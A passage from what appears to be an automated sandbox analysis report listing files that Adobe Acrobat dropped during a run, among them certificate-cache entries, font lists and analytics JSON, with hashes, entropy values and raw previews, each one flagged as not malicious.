                                                                                        Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                        Category:dropped
                                                                                        Size (bytes):71954
                                                                                        Entropy (8bit):7.996617769952133
                                                                                        Encrypted:true
                                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                        Malicious:false
                                                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):192
                                                                                        Entropy (8bit):2.7386214950254377
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:kkFkljqXHkNvfllXlE/HT8k0RrXNNX8RolJuRdxLlGB9lQRYwpDdt:kKBXH9T89NMa8RdWBwRd
                                                                                        MD5:FE8CEDF77ED3167C33231ACB41102EEB
                                                                                        SHA1:8DEC929CB9C68E2F59F38F7CCCD9F4FA2DB35F35
                                                                                        SHA-256:A9DD42A74300539BAD9C8D95FDEF834BDD3C92E04E155294B7A269DAE000CE54
                                                                                        SHA-512:62EE7325BD3051B744766AF1B693EFAFA029D6CCA5E9431E76ED42320BEA4DFB884AA3979F83E188C1C09A43A3FF0F69D95564CD8558CC91DA81683916E620EF
                                                                                        Malicious:false
                                                                                        Preview:p...... .......... .Q..(....................................................... ..........W.....t..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:data
                                                                                        Category:modified
                                                                                        Size (bytes):328
                                                                                        Entropy (8bit):3.150184159866505
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:kKKF9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:SsDnLNkPlE99SNxAhUe/3
                                                                                        MD5:429B460B1FC97A6814F5912C6FAEC2F3
                                                                                        SHA1:8CD387581A063260EE6E79CE9B63CD1C3D66891C
                                                                                        SHA-256:4EC31445F83F5C58057C11AA56060A2389F47D3AE027F4E381B1D7819256A80A
                                                                                        SHA-512:9F6C5C9A1FB6851A927C8E7DC46B107B9A4F4503CD1CEDA98AE9829CE8500BDDB1469B9906A64FFD104A22B07C3E25A18AFE8F7CFDA423492E83E5038A61AE5F
                                                                                        Malicious:false
                                                                                        Preview:p...... ........K.L.Q..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:PostScript document text
                                                                                        Category:dropped
                                                                                        Size (bytes):1233
                                                                                        Entropy (8bit):5.233980037532449
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                        Malicious:false
                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.1312

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:PostScript document text
                                                                                        Category:dropped
                                                                                        Size (bytes):1233
                                                                                        Entropy (8bit):5.233980037532449
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                        Malicious:false
                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:PostScript document text
                                                                                        Category:dropped
                                                                                        Size (bytes):1233
                                                                                        Entropy (8bit):5.233980037532449
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                        Malicious:false
                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:PostScript document text
                                                                                        Category:dropped
                                                                                        Size (bytes):10880
                                                                                        Entropy (8bit):5.214360287289079
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                        MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                        SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                        SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                        SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                        Malicious:false
                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.1312

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:PostScript document text
                                                                                        Category:dropped
                                                                                        Size (bytes):10880
                                                                                        Entropy (8bit):5.214360287289079
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                        MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                        SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                        SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                        SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                        Malicious:false
                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):295
                                                                                        Entropy (8bit):5.382891432266463
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJM3g98kUwPeUkwRe9:YvXKXXggfsdTeOVcQzGMbLUkee9
                                                                                        MD5:E566E015CAF83A02151B7243B29C72EB
                                                                                        SHA1:130C87BEA3EB394DB79E95FE916E4DCA408DCC72
                                                                                        SHA-256:7D71AA2988C2B4B336A83DD3FF48E4535BCCCC07F44564F00C5DBABB595384E2
                                                                                        SHA-512:3E8B418A83E4F295841B58FF5B03E87836F9ABD49DF19F47FEB8D3030758B52DC7B8317309FC17CB125737014BD8377F34A31C6951AADCC06202CC0BA3C7A8F3
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):294
                                                                                        Entropy (8bit):5.318868324057958
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJfBoTfXpnrPeUkwRe9:YvXKXXggfsdTeOVcQzGWTfXcUkee9
                                                                                        MD5:CB6F692B7A43C611AB490605754F038F
                                                                                        SHA1:01F7DA6FFCB9807C14E8BFA4340CCC7A0BEADF97
                                                                                        SHA-256:1E4E2C69F234BD9BC85C453DC699BA838F4AAAD53A069FD15ACE57079BE4AA4D
                                                                                        SHA-512:610482A6FAE96C5D35E66A6CD59F750601FFA067DB267F31929216E21B1882E332C9577E9319D8C784A535A85EF070C2311F9825970FEDBD44A9DF6145C635B9
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):294
                                                                                        Entropy (8bit):5.297416640583964
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJfBD2G6UpnrPeUkwRe9:YvXKXXggfsdTeOVcQzGR22cUkee9
                                                                                        MD5:7801547EA1D82FC07CE7FA951D9CB394
                                                                                        SHA1:8AD4164067D0F9996066F1D2BE5470B475B795FC
                                                                                        SHA-256:5B50B8B349F8221BA4E88B827D5C22A27E00EC6EF0FBC613789CF8E392380F42
                                                                                        SHA-512:405E7757E9AEF87B8FFE70A5A770CA7C6F7682ECB4CD836710187BBD6FC58AAEBDF18A3F8705A0DD423543C6120C9AA3E942F7D5129FE763BFC6349017D30E98
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):285
                                                                                        Entropy (8bit):5.37045493001599
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJfPmwrPeUkwRe9:YvXKXXggfsdTeOVcQzGH56Ukee9
                                                                                        MD5:8D8DD8512EC802E32419394DBB3874B8
                                                                                        SHA1:2840522646B87903C07B273998A28ACC5B8263EA
                                                                                        SHA-256:CD619DD6A1F8E86F4D1B4A683F79E6C573D7CC7E2049BC2E47A6D9FE0A978FC9
                                                                                        SHA-512:0D5A6383A52D1A9497F07F895C3CCE37062DDD262A2B2C33DADB5FAC1EEE25FE0DC61D119C8BBC238BCD6E0D3A6ACF6EB9D5420EFD62D7C8BDEDEE84F3E88E7C
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1123
                                                                                        Entropy (8bit):5.689221089414709
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:Yv6XXtmeOVKpLgE9cQx8LennAvzBvkn0RCmK8czOCCSG:YvaIezhgy6SAFv5Ah8cv/G
                                                                                        MD5:E998C74F596A92E35B6F732AB820FB94
                                                                                        SHA1:0223B2544C54E802B274DE935D7FC2B5C8EFDC9A
                                                                                        SHA-256:5B3147F310DA7B3F69F39A2D12D80D7A1F703623523C4742A79069D53872DBDD
                                                                                        SHA-512:7E0BA993697941A8F5F1C3BEF9985FB4DBBFEE45E2134DF020AECC1CCDB42AB713985974BF7759DF5D79562ED2FA6038E0F998F34632B672AF650BEBB15241F6
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):289
                                                                                        Entropy (8bit):5.305741763185677
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJf8dPeUkwRe9:YvXKXXggfsdTeOVcQzGU8Ukee9
                                                                                        MD5:D97D2B4D4A5141A202E1C44537F7EB07
                                                                                        SHA1:CBAE8AE4B342C4E65A7287CA4A25E940A62B3A73
                                                                                        SHA-256:A56515880F814387731863B089C6F7B2A31D262A27DF27CF32D8BC5A92F198CF
                                                                                        SHA-512:EA798AB4F2796FE38B00509F8CC725C2AAFDFC5DB775A119B7AE39356E25FA76528A6CE8E2B1C9219DC48581DCBB93AFE24E401033B4F39EA59449CB91D3D098
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):292
                                                                                        Entropy (8bit):5.309583408092351
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJfQ1rPeUkwRe9:YvXKXXggfsdTeOVcQzGY16Ukee9
                                                                                        MD5:C4459D9B511197679385414F8EF15382
                                                                                        SHA1:C85F0D6E5CF093B4A9230797F06672744E27B21E
                                                                                        SHA-256:1AB14020BB8C44B33033B51F0BA4580AE23F07220BCD240AADE2506322AC56B6
                                                                                        SHA-512:C5F89EEC6360C7FDC23BE55C3C8D66E054DF9EBF65BEC83EEF0496A22E82E658EFD891AE098FCFE33A0CEF1F0AC93BDF0D74C2D9FA4CBECF95624E5FF797434C
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):289
                                                                                        Entropy (8bit):5.325202968244981
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJfFldPeUkwRe9:YvXKXXggfsdTeOVcQzGz8Ukee9
                                                                                        MD5:A3AF0F7E2C4F523FC6755B54D992993C
                                                                                        SHA1:B75D2E89A4483553B35E8B78708337064F7C8A03
                                                                                        SHA-256:D14670536904AE1B27FD29FBA9207AF3CFD001FFAF37A91F80909D6F75F520EA
